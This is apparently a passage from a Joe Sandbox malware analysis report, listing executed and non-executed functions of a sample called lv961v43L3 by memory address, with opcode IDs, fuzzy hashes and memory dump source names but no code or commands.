                                                                  • Snapshot File: hcaresult_0_2_7ff848f20000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7db9a79372cfee6515133ce0fb61bdddb4bfeba74a023a4a42181dbe5dc6632f
                                                                  • Instruction ID: 87a2318ac493abfbf3839bbd1c95ab1c6630de27da5e5bcd02ce87238cdb7576
                                                                  • Opcode Fuzzy Hash: 7db9a79372cfee6515133ce0fb61bdddb4bfeba74a023a4a42181dbe5dc6632f
                                                                  • Instruction Fuzzy Hash: 34015B31E0C81A8EE7A4FB5CA8152B97292BF94390F1502B5C41DD32D2EF397D858A49
                                                                  Function 00007FF849697BBE Relevance: .0, Instructions: 49COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2118761134.00007FF849690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849690000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff849690000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 552ec197f893f5965b0a40ef7bb770970a053616f202d0836847db13a25c8fe8
                                                                  • Instruction ID: fb10aaa6c09fdb757ff5f4f650ee2962afe4ddb8c450362e3464109c12277de2
                                                                  • Opcode Fuzzy Hash: 552ec197f893f5965b0a40ef7bb770970a053616f202d0836847db13a25c8fe8
                                                                  • Instruction Fuzzy Hash: 95F06871B0C6098FEBA8EE1C68162F973D1EB98265F10513FE54EC3666DF2558424781
                                                                  Function 00007FF84969C72D Relevance: .0, Instructions: 47COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2118761134.00007FF849690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849690000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff849690000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 66f27de50782b1de8445b287c87d650dce50fe591918c2186e25c77dfcda829f
                                                                  • Instruction ID: 14be7ef28bd32d1456a8c20f0f6cb32f2f720aacbd35849c3f856e6e1915f1d6
                                                                  • Opcode Fuzzy Hash: 66f27de50782b1de8445b287c87d650dce50fe591918c2186e25c77dfcda829f
                                                                  • Instruction Fuzzy Hash: F7F0A97194E3C58FC3129F748C299A1BFE0EF1721470A86EED0CACB4A3C25D8886C712
                                                                  Function 00007FF848F25A29 Relevance: .0, Instructions: 40COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2109522442.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff848f20000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 12a67fa5476ea8b9747e9a505184f30cb3d5d14d3b029b62dcb2fefdabfeff64
                                                                  • Instruction ID: a60b43909d11a8dd1471338a16b461c7402072396fa8fb308f09210ed765ae20
                                                                  • Opcode Fuzzy Hash: 12a67fa5476ea8b9747e9a505184f30cb3d5d14d3b029b62dcb2fefdabfeff64
                                                                  • Instruction Fuzzy Hash: 73014435908A5ACFCB55EF04C894BA977F1FBA8314F1502AAD44DD76A1DB34EA40CF41
                                                                  Function 00007FF848F20C50 Relevance: .0, Instructions: 40COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2109522442.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff848f20000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c482a22f39f750369f2ceef4309357359fd69eb4bd08dd9ffbcc036be2a01c15
                                                                  • Instruction ID: ba37ae00f4c7399834df4cf045b4a0461bdf336819a14e9de973e8979cf86a98
                                                                  • Opcode Fuzzy Hash: c482a22f39f750369f2ceef4309357359fd69eb4bd08dd9ffbcc036be2a01c15
                                                                  • Instruction Fuzzy Hash: FE015672D0D2899FE712FB6498500A97FB0EF86350F1441F6D848DB2D2EA396A488785
                                                                  Function 00007FF849692F32 Relevance: .0, Instructions: 39COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2118761134.00007FF849690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849690000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff849690000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6acc42d74ba9775d0dcfcfb17a8248f8898061bb007b2822e60306df0d2a066f
                                                                  • Instruction ID: 3421ed694698ba9e21223dfb6aaafedd4da1e835309f733e1686c0b25574ea9c
                                                                  • Opcode Fuzzy Hash: 6acc42d74ba9775d0dcfcfb17a8248f8898061bb007b2822e60306df0d2a066f
                                                                  • Instruction Fuzzy Hash: AEF0F03188E2C69FD326EF7088215E93FB4EF43244F1800FAE049CB0A3CA6C560AC361
                                                                  Function 00007FF8492E8902 Relevance: .0, Instructions: 38COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113807833.00007FF8492E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff8492e0000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c8cb700df543d9a6ec75321e5defcd50652290d92375cc8b3ac79b500cb5c709
                                                                  • Instruction ID: 1ed444f0c41b80b47601473242912a32dd522e45850ff2d721155af1ea06ec11
                                                                  • Opcode Fuzzy Hash: c8cb700df543d9a6ec75321e5defcd50652290d92375cc8b3ac79b500cb5c709
                                                                  • Instruction Fuzzy Hash: E2F0C23184D2D99FE722DF7488914E97FA0AF03214F1800FAD09DCB1A3C62D5A06C762
                                                                  Function 00007FF84969D642 Relevance: .0, Instructions: 38COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2118761134.00007FF849690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849690000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff849690000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 670dff53c44bd7382053432a44cd2c5ea87cba558c10475f9b55ef5b67637d2f
                                                                  • Instruction ID: e796750f6f4fbda9e4a13c4ff4336078a0a97da71e2538317261b55fb51f0315
                                                                  • Opcode Fuzzy Hash: 670dff53c44bd7382053432a44cd2c5ea87cba558c10475f9b55ef5b67637d2f
                                                                  • Instruction Fuzzy Hash: 6CF0F03184E3C69FD362EF7088254E93FA0EF43248F0900FAE049CB0A2C62C2646C761
                                                                  Function 00007FF849693BED Relevance: .0, Instructions: 37COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2118761134.00007FF849690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849690000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff849690000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f64a8119be84e651677bb2926f37121ef91ea55627ad4b7341883e8720f21e8f
                                                                  • Instruction ID: 5defa81251a9572e80647485849cf20e930d285c3212aaee511f1360410d6e60
                                                                  • Opcode Fuzzy Hash: f64a8119be84e651677bb2926f37121ef91ea55627ad4b7341883e8720f21e8f
                                                                  • Instruction Fuzzy Hash: B3F0B832E0CA4D8FE7F9EE4880483B972E1EB98340F00443BE00EE32A4CE642C854780
                                                                  Function 00007FF8496985E2 Relevance: .0, Instructions: 36COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2118761134.00007FF849690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849690000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff849690000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: cbb4ff6c7c51937338537c9b74a5b6882a385783952b9fa5175b1d821e644197
                                                                  • Instruction ID: 66cc8a5c8374a43eedfd91460c8ad2f0b5caa1f7ba40a892ad6a25040b0e53d7
                                                                  • Opcode Fuzzy Hash: cbb4ff6c7c51937338537c9b74a5b6882a385783952b9fa5175b1d821e644197
                                                                  • Instruction Fuzzy Hash: 14F0963184E2C59FD753EF7089555D57FB4AF43258F1900FAD049CB0A2DA2D161AC761
                                                                  Function 00007FF848F20BB5 Relevance: .0, Instructions: 36COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2109522442.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff848f20000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e6f6c32a4ff5cfaeaf2b5051f3b9089556b6f1a1877cb541a2d7b08c7f3812b8
                                                                  • Instruction ID: 224c4c86d326f72534919735e09873a87b8bfc55a74e2249cbe7020055353e56
                                                                  • Opcode Fuzzy Hash: e6f6c32a4ff5cfaeaf2b5051f3b9089556b6f1a1877cb541a2d7b08c7f3812b8
                                                                  • Instruction Fuzzy Hash: 09F0E531E5D54A4FEA407378E8D24A87F60EF4B310FD504F2D489CA0D3EA4A589A8716
                                                                  Function 00007FF848F20B77 Relevance: .0, Instructions: 35COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2109522442.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff848f20000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5d1eca6e89c34facb1142ebffe210a87a8074512dd10663598e782b97dedc227
                                                                  • Instruction ID: 2c7b4b8e3a9c2384f151e18947adbb935f9dda1334c699a7f1670f3ae16a3a4c
                                                                  • Opcode Fuzzy Hash: 5d1eca6e89c34facb1142ebffe210a87a8074512dd10663598e782b97dedc227
                                                                  • Instruction Fuzzy Hash: 11F0553560DA85CFD780AB38ECA04D4BBA0FB02209B6616EAC0C9C7093D2921809C700
                                                                  Function 00007FF848F219C3 Relevance: .0, Instructions: 35COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2109522442.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff848f20000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9fa238edc377ae3c28a821189041c77311f2d43d622b9171109d735dc1095405
                                                                  • Instruction ID: 643342e4e37fe4561cbe4e4764d6ed320aecef4574f992b8f5b8ca0e69ba4efd
                                                                  • Opcode Fuzzy Hash: 9fa238edc377ae3c28a821189041c77311f2d43d622b9171109d735dc1095405
                                                                  • Instruction Fuzzy Hash: A6F03C31E0C81A8EEB64FB58D8556F873A1EB94392F1401F6C04E972E1DE3979C68A48
                                                                  Function 00007FF849699DB8 Relevance: .0, Instructions: 33COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2118761134.00007FF849690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849690000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff849690000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a3f2871f675e194bb93793ce4fb05f8f40cbf0c50a451355ad89cb1591f5974f
                                                                  • Instruction ID: 44daac507bc5a7c347c4109f8fa822298ec60bdd070c708a526df5d0a29a19f8
                                                                  • Opcode Fuzzy Hash: a3f2871f675e194bb93793ce4fb05f8f40cbf0c50a451355ad89cb1591f5974f
                                                                  • Instruction Fuzzy Hash: 92F0A025A0DE878EFFF57D00A4522F9B201AF523D9F20943BD40E82AC5EF1E75054391
                                                                  Function 00007FF8496A3C90 Relevance: .0, Instructions: 27COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2118761134.00007FF849690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849690000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff849690000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9b2269d92d9581e254336586affaccf01f9b27445e621df4d4baabf056bcd6cd
                                                                  • Instruction ID: 8c63ca2acc684b2dccaccad2cbde4d116647fb5ee60ffd3d0d4df2fe9e46b971
                                                                  • Opcode Fuzzy Hash: 9b2269d92d9581e254336586affaccf01f9b27445e621df4d4baabf056bcd6cd
                                                                  • Instruction Fuzzy Hash: 2DE08630624B084B8B0CEA1D888683577E1E7AA642B94406ED446C6255D926E8858782
                                                                  Function 00007FF848F261A2 Relevance: .0, Instructions: 25COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2109522442.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff848f20000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 56b90ccf1736245e8e2943db465f5a8918f681c939a5da53cd05dabe9b78db00
                                                                  • Instruction ID: 26f9196406735b8252ef0e5b33a1d5fc69642307707be3e3b7f04e1aa36bc3c3
                                                                  • Opcode Fuzzy Hash: 56b90ccf1736245e8e2943db465f5a8918f681c939a5da53cd05dabe9b78db00
                                                                  • Instruction Fuzzy Hash: 19F03935D0C11A4FF7A4A394E4513AA73A0EB84350F1400B9D90EA37C2DE3CAE818B1D
                                                                  Function 00007FF848F206A5 Relevance: .0, Instructions: 13COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2109522442.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff848f20000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 53971b2b7a1ccf372673725fb3507a6dec60887fbbe3a948b12780484fbb2f21
                                                                  • Instruction ID: 7b6de91a4ad0a58b62b15505831059e939ba8390a7cc6308592e73ccdb3e3da7
                                                                  • Opcode Fuzzy Hash: 53971b2b7a1ccf372673725fb3507a6dec60887fbbe3a948b12780484fbb2f21
                                                                  • Instruction Fuzzy Hash: AEC04C26D5F51B59F415B36E74460ADB9406BD5790FD50172DD0D405C1AE4F20D5029E
                                                                  Function 00007FF848F212B0 Relevance: .0, Instructions: 12COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2109522442.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff848f20000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 85e310c31d9c320a6a6d98d9c2204c04a471e198612afe6b49aad868d401953c
                                                                  • Instruction ID: 113e2643307379907782fd90d788077e2b902a7d0610b81c7d7edf45b456fd57
                                                                  • Opcode Fuzzy Hash: 85e310c31d9c320a6a6d98d9c2204c04a471e198612afe6b49aad868d401953c
                                                                  • Instruction Fuzzy Hash: 71C04C345558098FC948FB29D88591477A0FB19215BD60090E409CB1B1D65ADCD5C745
                                                                  Function 00007FF848F20B18 Relevance: .0, Instructions: 12COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2109522442.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff848f20000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0e13373b9b58342ce0a6d250e1279e2ab542b43c18f7d8366746ebde3e909453
                                                                  • Instruction ID: 9949d6ecbbfdb685cf99504ec335c7d90d2898a58c5e8b0c8d697910e07bfc36
                                                                  • Opcode Fuzzy Hash: 0e13373b9b58342ce0a6d250e1279e2ab542b43c18f7d8366746ebde3e909453
                                                                  • Instruction Fuzzy Hash: FDC08C304108088FC900F72CC89480072A0FB0D210BD10090E00DCB2B0E31A9C80C700
                                                                  Function 00007FF8492EA0EB Relevance: .0, Instructions: 11COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113807833.00007FF8492E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff8492e0000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6f4638bde2b61fcefbbb0c6687629a8e9d07f94e331dabadf6f31afb86bdf19e
                                                                  • Instruction ID: d285db971d43c5b886f3f93f70fb94f20119492b1cbd221c31979f5871d95d3e
                                                                  • Opcode Fuzzy Hash: 6f4638bde2b61fcefbbb0c6687629a8e9d07f94e331dabadf6f31afb86bdf19e
                                                                  • Instruction Fuzzy Hash: 9AD0C914E0D5F3ADFD79BE0E80E123962A05F003C0E60003EC0BF558C1CF1DB941A212
                                                                  Function 00007FF8492E0BCB Relevance: .0, Instructions: 11COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113807833.00007FF8492E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff8492e0000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0a3b9adb34d20b3e1d93a9cc01d0eff41c14b83124165eb73163c2744f033e35
                                                                  • Instruction ID: 6c05563a4fe22539c1d4265532ec25633fd7c92e6cc4d2fa2f78494f91272a18
                                                                  • Opcode Fuzzy Hash: 0a3b9adb34d20b3e1d93a9cc01d0eff41c14b83124165eb73163c2744f033e35
                                                                  • Instruction Fuzzy Hash: CFD0C918E9D5AB8DFA787E0940E023DA194FF41385F20407EC0BF41CC5CE2C75036201
                                                                  Function 00007FF8496946FB Relevance: .0, Instructions: 11COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2118761134.00007FF849690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849690000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff849690000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b30ba595e529da04b31fe7faa606bba1f82000a79a3dc209565a206e8ee8e061
                                                                  • Instruction ID: bcb2f4d6859c4047c2abf1cf39c8e3a827a394d3726b5f021320e52b45c9bb22
                                                                  • Opcode Fuzzy Hash: b30ba595e529da04b31fe7faa606bba1f82000a79a3dc209565a206e8ee8e061
                                                                  • Instruction Fuzzy Hash: D6D01214A1D5FB8DF5F87E16813023D16D65F4A3CDE60003EC85F458C1CD1D75016711
                                                                  Function 00007FF848F25E65 Relevance: .0, Instructions: 10COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2109522442.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff848f20000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1294790627edb11ba0e0e4117cc966bb6691d05a197afe9bb2cf592c32e79cc5
                                                                  • Instruction ID: 8900fb868bc42d866c56cb2dd7747725bced2dee781c7565cac7b909fd99f68e
                                                                  • Opcode Fuzzy Hash: 1294790627edb11ba0e0e4117cc966bb6691d05a197afe9bb2cf592c32e79cc5
                                                                  • Instruction Fuzzy Hash: 59C08C12E1BC1A86F366270450202BE48038F80748F941075E00E873CACF4C2B01428F
                                                                  Function 00007FF8492E00DC Relevance: .0, Instructions: 9COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113807833.00007FF8492E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff8492e0000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f47a4732b847994c241d4edced542201c3f10715321793ed3362fb85d18cdddf
                                                                  • Instruction ID: 890755e127fc9b165c1f139a17f6a0ba9b43c1c50f089f086e7a06e7d8554b47
                                                                  • Opcode Fuzzy Hash: f47a4732b847994c241d4edced542201c3f10715321793ed3362fb85d18cdddf
                                                                  • Instruction Fuzzy Hash: 60C08C00E8E2D30FFF3126B808D007C0B900F1A280B180572C06A860C3EA5C2C029354
                                                                  Function 00007FF8492E960F Relevance: .0, Instructions: 8COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113807833.00007FF8492E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff8492e0000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4ef55ce510aa60a4c7044e8f446600c48dcb3103826998ea4144fae83b2d77c6
                                                                  • Instruction ID: 261921ac8dd20c6cc59eba487c5d98872b679cef9be6bde7d643215cbadb138d
                                                                  • Opcode Fuzzy Hash: 4ef55ce510aa60a4c7044e8f446600c48dcb3103826998ea4144fae83b2d77c6
                                                                  • Instruction Fuzzy Hash: F8C04844E0E2F69EFF35AAB828E507C06804B16380B952573D12E8A2D3E84C690552A1
                                                                  Function 00007FF848F206C8 Relevance: .0, Instructions: 8COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2109522442.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff848f20000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6eba791d88507fcd9b52fcee0306e07b664c1240055e9c8e5b93111289e53873
                                                                  • Instruction ID: b1a946f32eae564092c0f3c60d0834f421d52b35b87ca455c30be94ef4ed59ee
                                                                  • Opcode Fuzzy Hash: 6eba791d88507fcd9b52fcee0306e07b664c1240055e9c8e5b93111289e53873
                                                                  • Instruction Fuzzy Hash: 99B00215C6E44F45E454337A294616574506B85254FD51170DC0D505C5994F15D5139A
                                                                  Function 00007FF849693C41 Relevance: .0, Instructions: 6COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2118761134.00007FF849690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849690000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff849690000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: fddeb7832dd4bc296222abbbbc33e46de1bf986c69211a7ff5c051574ef53592
                                                                  • Instruction ID: 9a892167e7e243f7b23d748e6263df8aaa350599207128a4d937af555927fe98
                                                                  • Opcode Fuzzy Hash: fddeb7832dd4bc296222abbbbc33e46de1bf986c69211a7ff5c051574ef53592
                                                                  • Instruction Fuzzy Hash: 47B00211F4C697DFF57439B9045547D10410B5B7C9A641976D61FC65D3EC5C78401251
                                                                  Function 00007FF8496992F1 Relevance: .0, Instructions: 6COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2118761134.00007FF849690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849690000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff849690000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8115c9163006cba18085809dfc0759a023b0c7516a104e9c9b655e8ed7c2d6d0
                                                                  • Instruction ID: 742770df2f09d9ebb578dc6d1899cd00e595cd90aafada07db6a97702b51f31f
                                                                  • Opcode Fuzzy Hash: 8115c9163006cba18085809dfc0759a023b0c7516a104e9c9b655e8ed7c2d6d0
                                                                  • Instruction Fuzzy Hash: 28B00210F0C6D75FF6757CB85CD557D14410B456CDE540535D51F461C3DD5C3C406191

                                                                  Non-executed Functions

                                                                  Function 00007FF848F20E43 Relevance: .2, Instructions: 171COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2109522442.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff848f20000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 020b1316f29f29eb59a02379cd5e2e4c6e8719dd63dbf9ab0c86af3a988da654
                                                                  • Instruction ID: 1db650858a6f65ace624f7963b2adf3511300acae4ab5dad6fce3498dd256983
                                                                  • Opcode Fuzzy Hash: 020b1316f29f29eb59a02379cd5e2e4c6e8719dd63dbf9ab0c86af3a988da654
                                                                  • Instruction Fuzzy Hash: F251E372A18A998FE389EF6898597B9BFE1FB95350F50007EC089D37D1CFB914508700
                                                                  Function 00007FF8496909C0 Relevance: 5.2, Strings: 4, Instructions: 230COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2118761134.00007FF849690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849690000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff849690000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: #9$!+9$"39$#;9
                                                                  • API String ID: 0-1639628421
                                                                  • Opcode ID: db0919bf64c59b35bcf609b5a039cc6aaa901a50ebd888ac61556b23f7b45f7e
                                                                  • Instruction ID: cb402d7a9c87debc0683895b23ba608c4a2c779b53f84016d7380aa81ad4222c
                                                                  • Opcode Fuzzy Hash: db0919bf64c59b35bcf609b5a039cc6aaa901a50ebd888ac61556b23f7b45f7e
                                                                  • Instruction Fuzzy Hash: A5514B1392F176A9E19176FC78025EAAB64EF453FDF088377E14C8D1838E1C648183E9
                                                                  Function 00007FF8496901B8 Relevance: 5.2, Strings: 4, Instructions: 204COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2118761134.00007FF849690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849690000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff849690000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: CA$!KA$"SA$#[A
                                                                  • API String ID: 0-3700520172
                                                                  • Opcode ID: 96dd22b00d614858c8b155fb1170989f52d0b32f84f7a925d2882f9cdde4bde9
